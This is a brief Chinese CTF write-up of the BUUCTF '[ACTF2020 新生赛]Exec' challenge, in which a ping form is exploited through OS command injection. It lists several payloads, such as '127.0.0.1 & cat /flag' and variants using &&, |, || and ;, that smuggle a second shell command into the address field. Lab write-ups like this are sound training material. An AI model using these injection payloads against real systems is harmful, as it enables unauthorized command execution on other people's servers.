BUUCTF:[ACTF2020 新生赛]Exec

BUUCTF:[ACTF2020 新生赛]Exec_第1张图片一个ping界面
ping着试一下
BUUCTF:[ACTF2020 新生赛]Exec_第2张图片输出了数据
直接执行调用系统命令,利用cat看看存不存在flag目录

127.0.0.1 & cat /flag

BUUCTF:[ACTF2020 新生赛]Exec_第3张图片直接就出来了

其余几种写法也行:

127.0.0.1 && cat /flag
127.0.0.1 | cat /flag
127.0.0.1 || cat /flag
127.0.0.1 ; cat /flag

前面的地址可随便填写,只要让系统执行到后面的cat /flag 读取出来就行

你可能感兴趣的:(BUUCTF)